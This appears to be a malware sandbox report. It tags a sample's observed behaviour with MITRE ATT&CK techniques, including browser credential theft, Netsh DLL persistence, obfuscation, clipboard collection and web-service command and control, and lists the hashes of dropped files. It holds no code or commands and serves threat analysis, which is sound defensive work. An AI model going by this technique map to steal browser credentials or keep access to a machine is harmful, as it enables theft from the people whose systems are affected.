Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\334358ec-9160-46e4-8dd5-740c4feb3921.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
2ab047ba5b7dc3f9c26f0a426e5d6906

SHA1
63318757b6dc34a2aa915881ba0ab1b4d818f363

SHA256
617c28bbcd9ba9d18ab24ecd760ddcfb1949d31ee7f50670025e6100ce42abb4

SHA512
fe96c17e2d9d43fc5189bfa4e31416b94c5380c2c9342c7f8feb4416a10474a3f010fe2627770eaf8d0b81ef6785139fcf8746821590ace977ed19ee728d7645

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
352B

MD5
d761571be6380ea179f8e64da7007afa

SHA1
e6328ed8e198ad50d6c4aa169b69e22ee4c89983

SHA256
3b0555f258f8a87bbd482da6b465519c615d22a42b93a6cf9c8c97fe0a57802a

SHA512
3153a7d9714b5e755fde4ae5b2114fa2dd06606ca4f6778b8a36674ac2120403d0dc414924490df22a61733c80d0e013b419803a9fb956a4eb9d107a62b302c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
247993973b2fc5f2e027fe622c294ed7

SHA1
7cf138e77a882e89437d6eaef253e9d50c2ac8c0

SHA256
811b45d2bf7caa298a4e60c8519e4841a36bde36197ca5eb5734d9e14aa47c01

SHA512
2f74aa8300448380439506d99b78241e048d84e991423c173d9221e91e6303efa799295aea0180b74a097585639225316f86c7c8cee61e5f32d1b80490d42157

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
100KB

MD5
ce72982244d3529df0cd034361dd2162

SHA1
d03eacdfe040f7fc33feaaa6b4bec6102afe4f64

SHA256
03472369216b32a2799ea29782eaa9da5532d55abbb9e049137243efb98e6b9c

SHA512
511c7ecc0ec163c03598147ee67adfe42dc3540be8bb1d4d7355f2b145cbcb2980202a664005aa312d8f921db9f269b9b1572336d20dc4ff95cd6c1b0dcc8c80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2a689c6ed50bcba30f8bcdee08788997

SHA1
ad643bc30bb2990fe1d9156c83fc4cdd9b4033e9

SHA256
f2a545b01ae1611fd31d94b6d7e702c29eee6bfee3d372ac6fce8a8f92e0e431

SHA512
030726abc71951e3aea7f7f1593819991e4765d5b958ade8a16dcfc6360e64795bcf9a89dcf1dc3bd1ec2e70a2bf28bb0010c110d89c1674e19ec56861d8f4ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9e3fc58a8fb86c93d19e1500b873ef6f

SHA1
c6aae5f4e26f5570db5e14bba8d5061867a33b56

SHA256
828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

SHA512
e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
27304926d60324abe74d7a4b571c35ea

SHA1
78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

SHA256
7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

SHA512
f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0f58abbf7ed24b0f0866454953b91a24

SHA1
be1dd52792fb560447c288cdf8ed2fce4f9c29e6

SHA256
ddfa09be88487fe417c7bf2801caacd3fd1daa273f71075e16372a44c7e160dc

SHA512
eba4e409a3b0a9baf2ed6c233e6d81b3269da07eaa1eee06ce197d664ab17546edd1ea22d9a792e603c04f5311c4f61d2b076e66b4a3a639a2bbd015baed2562

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
32KB

MD5
64c10f93926b45f7a374e33c90fc244f

SHA1
6bc05ab8a76324f7aa0ae98f58a549ba1b94c3ba

SHA256
2083c8e8acd6ec0180a8d7d12e1b03fdca7dde9d70a8e3409dc503b0d2536b47

SHA512
2f3d3bb311738f70cff15ce893b9b4c6dc7c9419fff470e0d4a9e0d7f79e6660b1c3d7111f3717f3a74a25bb4a74ead6c5716899bd9fac22b97981f6faf493b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
32KB

MD5
dbb3b15ca6316c746729b1f4782cee84

SHA1
4d52df6958cb4f30d22340850c08006b8e4decfe

SHA256
b918b04e25423a0a6723f8cc426e5f4435b4639b8112820c4dcc3614f9f002d2

SHA512
e8ad7ccae5126c7e19955dadc076e5000b21db4dcef319e8e4fc310057aedb4f840bbef322c711e7e25599c61b87e8b075db1f619c4df15e41109e5f744f8afa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
840B

MD5
e8a547e2ed605341ae01c22a10cc815d

SHA1
044a0d12ec9196d28c8e1b32719bba0ecdd5a1cf

SHA256
72bb30e3d8597f1e0169105cedab105a3394b5182368ac977b0b4dd5ca9e200c

SHA512
1ee93075a4dea5a231271626adeeb6dd648594716428c635e140fda3d2454963afe9e03bb3c1313bd095a855242c12973864dd39207d36821b26c39cd5e736d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
5539a76107ce478aba0c2a942d41aa8e

SHA1
b6a64cb0cb4fb258dddb93c335b4a6d1b53db7b2

SHA256
acaf5a88dba644ccbd59b8638b6624409127936b31d1c12186ff564c7df46000

SHA512
f86aec68798fd43202c24aa30de559d4a021eeeb1a4f2dd7a04c2272dbf2a27a1d4efb7a0dd760e01d9d535ee0c41ab9215a4a8c4979779934092fb9365a15a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
91f88b6f4a439d07607ad78e436a7f3b

SHA1
ea4c05afa4cb62463651598438500ddde494f023

SHA256
44939fc28a2ee33aa934e2c95bfc25fe22b2ece5ec64d6a1861866cb76c4819e

SHA512
2ef6e792a42b0c09c4fd6be877dde4421dca82e7deea4dcc50d9a73193d24a3203ae8a7771145d050f1e6ecb893a4a63981468743e8d3667eee6b790162f3ab7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
4defdc31bfc83daa9c11ea9befcff96a

SHA1
ecc8bb1cdff588477d8ba09ab032a9f231e8ad88

SHA256
915759e29a8dfde750d34966ebf20e2ef921182ab86697e750c4b079bda00511

SHA512
f47c61ca8ee783791d0d1a71e5a405be6843608d23364d55f4fad14ac5089df30658500dafaca4cff7c63a6648055e3d8bda1c78c78851b488f18d244cfa0337

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
96bd50d11297aab2d93d399fe919e6d0

SHA1
78f2532d4bf273bcef5a13d530e38f59f29afa7d

SHA256
fd462d533ef9da30dd7b8abdf3347bdd0de85827ff8cda0d38f842c9dad8e32f

SHA512
ab52c180c1e550ca207999a4495727dfb1a7e6c41f05f75d57a9ec2a7e26602d983accc804f56075c5cfb320a7e40562a601f50645968c5036d72f8fc07dbbaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
08360576856966ce5ad567d17d3021c7

SHA1
dc5658686484f8e35d5ccaf3ab942d2fcacf1ae9

SHA256
17aeb59043ccc7e40c828a9ae2badc884f915e34ef0a6ae4f403636373f0ffb1

SHA512
62a26abbf589369b24b8c54f9fb3f893398208bf0d07ff42f82cb89674eea7419f906365f0ccbddf03220c5b20dcbca1e39fefdaa05f4559d380b8e35bf6e44b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c3ecc3b61a235083c51adf9733da0a2d

SHA1
6b8f95f974d8e545195a6a1a5291d2c6025853b5

SHA256
4b65ada19964dc653687e4acfe48862e6e6bf442c4603b2b71c239ba55c5e4d3

SHA512
fa3805809bbd2d637291668b738a7161fe8b0fed05d3033f0dcf2128e50c9364c59c85c63c75944a6cc38fa713096ca166ac020d32ff0935ae436dd9dbde6df0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
0f0d43f0e544d755de3dcf2f394b1a52

SHA1
d019fe3e94f596cd6737f3e3d156b6d0c0d5880d

SHA256
03821e27f7a4e6b23ef8f31506889778186526b7053202989148756488639948

SHA512
8be33cc7478d492f566bc46f2af3128571aa328ec277d3f5c835fc6caaedd012399f1fab41a97c4378a7ed3cd6c772eb9d5f19e00755dc0dd7555de659fbd88e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
14f3c8dce29e370c3edee004d5cdbbf9

SHA1
a8660fd284b365f5121770fc46e89f16e77a9686

SHA256
60372058b57be84c52e7dbe3ee27b9fd747360f0371d47d7ea53ecfeb7bf266f

SHA512
121bec8de7a5892a77af5b50e486fbe1224d46f6794f3ce3da660f2e41cb0d920749619fd6d0fe31eb1f2757864996e6b013eed8491b519ee42e54a1d591ed5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
ecb0e3253f207abbdee2a4a033df9c91

SHA1
cca2e1d6cbc2ea90ae6b42fb072ce5737188efd1

SHA256
d6e2b59a2108e0fec1c4077467d9ed532e36fe6c5d119bf2f05c26c3c61c4cb5

SHA512
4e5edc5e9ad77693ad85ef799269fd40cc0e12e22865773ea632f8a503a5ef322e0241cef33c9936854727059b88384184feaa8f91489c47eb32ebe6d71b3232

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d079e7a8c327ce524e7451fee87c4057

SHA1
b2a63a58265eed71f25f91a08db190fb4a3ed644

SHA256
13e0ffe63f94fa81f786ca6e07c0f82daf6f90c9ac250be3795c47b218474080

SHA512
b12145b2c94bf4b71b59e088a024133cf09843f5df029565e9a8d7966c16b7337fba4e92b379d6da8f1b7de5d50e333f9bafacd1cff3fbfa14ae68fa33e13f16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bf5fa4a2c3b7a0a4d54f2e3c1694ec21

SHA1
2843f9d9505855634ff3bc824dbea0f68a56aa6a

SHA256
3f68e287b7cf5502064411861bd5c51cb8aae0c98989233391f0f75b2b235ced

SHA512
708ac3b87367e2513ec2a44451b791356b08ef6607db09ada849b730ec8f2d654ca4a77b39c8db216471eac966f32b1617c1fe750afb4d61621a121d76db7680

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e2d45ffd488821cf21848089da488bce

SHA1
fe747c0b512118724de27b4c8be253740ee7711b

SHA256
d279073fc16cf1fea27eaf00ede30f4d2e68180353277db33d0691a53e7de1da

SHA512
c595208d39b5f199315747f637bfdc4aedd9bd61c66062b41632fb6b5079859bec7e215d20f3dc46a2e76fa6a75c47229c1b08c35305ba2fd8425b5a5f1651d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\538bb676-58bb-41aa-acb0-a4332eebd920\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\60f27e67-36dd-47df-8fc8-1ecb936d8b68\index-dir\the-real-index

Filesize
2KB

MD5
3b4accd18ddff50f73c10d995cf2624c

SHA1
0edf3740394f5e05b9784cf2968a9b31283c0f2c

SHA256
c6a6a366b3bda4942f326c3e658c5b4c1fa593cc5d4157e86c06d61a4a3ea089

SHA512
64f7a89197c661fb20cc61caeafcffe949c77e771efa52811dbab8f69259fef5153f842db3c3bcfc52dc0deaa6878425462cc4e87452409b91fff91a8267704e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\60f27e67-36dd-47df-8fc8-1ecb936d8b68\index-dir\the-real-index~RFe58c119.TMP

Filesize
48B

MD5
5a42e970d4b61aa35da47fc664668a44

SHA1
1ac22a32ad133a50b447e41e2c05350bd53307a8

SHA256
0b98f4d14a2d0d24afb3cc118f9e13b267f3ca2044c21fc847e07b7bd57a19e0

SHA512
0be9d96cb4ecb84329775e0e45ec6c91236e23125090ca2c1d88028367bdf7b8c06806e9de77a2bb5bf63be8062d5680fb1e0d1bc1baa80d94dbcdcb5cfcbba6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ac6b842d-6a28-4c92-890c-132a03e25717\index-dir\the-real-index

Filesize
624B

MD5
285a06778250788f9eaefa30c7ec324a

SHA1
4a6506c17f2ed9058a52f7e7d288f290cf500ee3

SHA256
87bc85d57c998fa710847ac09b65aa61726eafc138fae28b01099830107e1821

SHA512
c013a47be98eedbd5e710e40c1d25e27d856a0b86cc92d7b6a47541cb77bb4236e17bb2ed019953e807413d2df3da0a49d6946a9acb36b901a56e2c2795230ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ac6b842d-6a28-4c92-890c-132a03e25717\index-dir\the-real-index~RFe58df3f.TMP

Filesize
48B

MD5
99ce9df3d97dfd7507df7d4806fd76de

SHA1
842baa96353c4f5c3937009c67dde557629f3b75

SHA256
4ce01c21f51faa7e5673300eca07c6f0398224f86be5ab8ec0960d8dd0ab85b6

SHA512
c3edfc516dcaebf47c9b3feff35eb633acb31b9d625279a8bb94951cc763c3296eec437a106cd01f4f2902782af6f5577ddb52d5f80a6aefd5a194eea8b945b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
054ceb8e2f268c77dc994b9d79a8cb75

SHA1
20a9d2aedf8e945719530a669d9386e0cf119c45

SHA256
8b57b6cbe58267af5f80abc63021c6c1ff839d0b232e0c1c007a486a336114c1

SHA512
43770ccd55eb58202e86946d3f33556d172da4341fa282321c910c72f84b4b9a9f5202b6d455689eb13bbc2d360a5287c15c066b5a4871bbb7f5205f99be0875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
157B

MD5
67a80404dd41a6e021e3591d4ce9eea7

SHA1
2e1efda0547a08074b646076ba38162072508473

SHA256
62dafd6fc8f91b1aff316c6b212a8f5f1525ad4279df2ca37db1f19b747b037d

SHA512
bf35616ad9d15a176242398d27c2da7ae7656953ce4b0edf7c417c56f41b726b9364cc4c6185726855a55c1f212303ef486e7793c850cf9421ebea0947527a5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
60e60b09562d11e117aa2b71221dda59

SHA1
f56647571ec25e7d15b091ffb28e9115ed272846

SHA256
2b79ae2e8b1683938ef3533aaaa1b0cf8dfb40c34dcbad456e98708a37e6ca86

SHA512
0013356a85b98d6946941ed20955066ab4dd143eb52f22d6ee3f8f388a5b853fc4931acda599a27319db083cce0c90a688f0358709d1d420a890003065f98887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
148B

MD5
eee699bc8151e7f32502db02a58e5263

SHA1
fb62b417f68e642267062b4528056a38097100fc

SHA256
2669500178afbbb3f53b398033dfab8e8b4e6cb508aec63a6838b70526b28828

SHA512
22fe18eac275a9ccfedc8c90157a5ddb86774bb7c77fdf5604f5ad0e6baa4d5bd3c3f3070712687e7a832473d8b039e0ce861442e3180b447f2742c1023ae78c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
626f74d6fe38fdb41d59e4cc704c4843

SHA1
4932d0617e1ade748e721abd1f50c6842677c28e

SHA256
9128893ccdbac93d68cfedecfc66e78fed8b10e762ee1a63e9e8d9089b536941

SHA512
9978b8da5813803a1835e255a401bd8b29363c99ca57cba01db3465dda7616801c46d9054f0aa2d52ff190686d6afbf948d36209abc0b3b7b943ae2b83e72431

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
a43669601069ef2358b555d64e26471a

SHA1
53ee06dcdba8532cc845c32a0fc34e78aa1db0ce

SHA256
7616ede5bd800f5101b320b7a719483150c12d24d0dc69283dbd210a1e36ec28

SHA512
79d557b50aa2b9fda73fb2b5df45e71fd3275aa6179699da8781723f423fb45b3764537132342cbae6351261f11fdc581854744c6d4ec9455a9284b8e0d57d41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58ab7d.TMP

Filesize
89B

MD5
0a408bf03dd0cfe5363140115f938ae7

SHA1
b8cbe7a3276e699029e674d4025bf708d777f1ab

SHA256
0e224f4ee4a62e3640f02116bda76d8fdad40774dbc480e1619a98798a883e80

SHA512
cb8efaf378340ae79407a85cd37569daf3f99122de4ca5b7fa8f80e946cc0d9393f994d683a16219f10f15b443d1eb2359adf7e50fc53522528a623bbc27aac1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
29b6d05061b1f4ec0967e5bc6cacd8b3

SHA1
d638cd7b16cf36f31b52e3b64c316e5a66552fd0

SHA256
70ec890275f0a556ed0087195f3de9b04f2aaa8c0380f583a1a6d066edbaeff2

SHA512
b3cf762c57c17a82356ec855ad465946ba4dd5ba624fcb8159b8c13dc70abf3c9450abf5ea708d4f1fb5f28efc0f5f0a6834d1cc932621399e0ba00225eb0cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58df30.TMP

Filesize
48B

MD5
b7de59768ffae3a25e87be085c58d1e3

SHA1
bce4d667a3d9000f303a45cb26d9c88fef4abd75

SHA256
2aa7a80fdd30c2f5badcfd1e9a3cb2995ebd23c08b82bb5e173b11ab21104b32

SHA512
45607ac0447a844c2e1bffe5cef871409d88be7b1cf35dd6ad3c3f7d8598ea058aedf9be69de66b5c3ae8de40c63309b966ca6122456fdfbf3f0a68e56354cf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
613f0a3907ede1a5428419336479789f

SHA1
0bd9a90646dc4cc2a76d25e306730faa2a4ee9ff

SHA256
180168eb6b8b9b12ad2a8119cc18cfa13d5bdead69b0286d55ba32a4abd0b1f3

SHA512
f34be309dfd1da638867296788373308703c5a91af8a6ff34dcda1cc7c7e320c09b2b665288b25124119e3c929bdcf614e35dad119b52d10d13721bd2b2f88de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
069bdfaa64a2afb8cf049a822a59bfe1

SHA1
f4bfaa8c65d61ed5fc6438803265ca6034ea0d12

SHA256
a0339003388121adc81da8e4d3c51fa77cb11c06af94edac5f14f3ff2ca3bdb2

SHA512
6e6d20291bac4cbe09e192ba508c01eca4aff6b6024a12dfdf1737ce00de50292e52d3944ca929e0cbfa51151f30e49207113fea5c51baf20c72691fcf0d8598

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
22eb5fee5fe8943b3720d62a7da2bd74

SHA1
71b7e849ee0760c0e95ed3e927173afa77b83b03

SHA256
e63e7f22e0b2de1484096ea1ffd405a2d44a5807ac2b8c70784bf0002264714a

SHA512
ad1add96a829bd18bb899acb2c03d76711bbff36ebc7a9bdad814d0794388838790491332934dbca405af330f96685827304366ade7bcc18f1c254dbd0e6f2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d8dde6d4af168629dfa580ee5d67cdba

SHA1
a8ab4d51ad56949fa6038b7ac2d1da8f4249e9d8

SHA256
7fe4f1dff740e0b204e461863eabdc6957ea4e59f1ad53b0bbfe0c85214c0f05

SHA512
4310966aa2647c51dfaf54893184426c30ab4813624211b8464794dae26a6ecbb4f5367cd5640a08365ceb61de4fb8b225ed46b563786e0b3dea9ccf5f996cee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
103f25a1ec115c95fb2a7dc2bdfccc47

SHA1
ed1b0ab15948418bd9c5a0106fee69c14890b3f1

SHA256
20533aee0fd11e0e8e7c96a3e2fe481666e41267633130c628830166e67da2f9

SHA512
2ce4fa8dd9754414fdbc9db24d6cdc1a548e4d50edfa2548ed3d5d49916366700bd39f2be7105c646d3bf473784a7727c23af9b38f83a7bc44d79346edbe84b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
32442f4fed5511679e410c51a4afd8cb

SHA1
bce302c2a471a59d0bef76b68ee264e70e4d08ac

SHA256
a5c729ed5840cecaa1eb217b6ffc04a74b691e4847a032d03647806b3e92820d

SHA512
1dfd7eee047a4adb7eb08cce37f6f9bc3c59cfbfd06b630c8ac387054c543348ee1ea3ae57c9bc0cba2fd8d46c4cd78d0814767043871e9dd2d1746ece2076be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
26c14041c99eecad103393d0a216b7b0

SHA1
6b72fdc45da966c0fab2576f2ae1fc2cf8ed12e1

SHA256
08decfdc8b0caa188a939a5b02a6d848b2a883b8438738579c200e149e908ff2

SHA512
09b81c0709ee51c8e5d52f81c23a817a53e0a34162e33cfc9a27095ce106ef91ebec17d8e20e3eaf323b782350f0e4881fb86f8ca7f4a765568795412cdc22eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
589c49f8a8e18ec6998a7a30b4958ebc

SHA1
cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e

SHA256
26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8

SHA512
e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
df3b15c9744cc8a942b7fc9b60c8f1a0

SHA1
cdc0cc8bdbf34c5baab2e807e51642fcb33a0859

SHA256
dc085881d034d0958edfac990a9970f47f3e71f5c0efa109ead8999e40e6f4d0

SHA512
351a64336d5386cdea1c1e7659fba05184bac8f718689dcc7cdf932f2bbca79dbddbda4ef6ae583eb56cf41f25d674bc526847e41233b068ddf41ea6ba633c57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
adb32c8d546834414debc885a1b5b0dc

SHA1
7c17455d4ef54f09382b4be90768deb0498a8646

SHA256
a0b13036199eae8406348b2fdfe90607a89afedf5f0b0089bcc81b70976dba55

SHA512
e53bcaf59af5e60566ba4725bd1b48ea296d2d3501aaacd519d16da95c768fa85387f6950dbdc3196e0891ab7c78b0b8cbbc341795b9898d173355fd67336382

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
aa9b10e841d3d556fa7e316571cce4f6

SHA1
1656f74bc15962db3319098f3b08327e7e5f3f9d

SHA256
4ddbdaa5807f3823fc3087c37ce9089945e32a1c6f167f0c4aeb955e1f82109a

SHA512
0b48de615d22d1ef4987f38ddccc8d6169b4b46c5b2d7ff07e05ba7fbbd04b43fbf4e0f1b101b2989219432db9a3115e3ead85881a121ad11ddaca5d05bebf9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29802\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

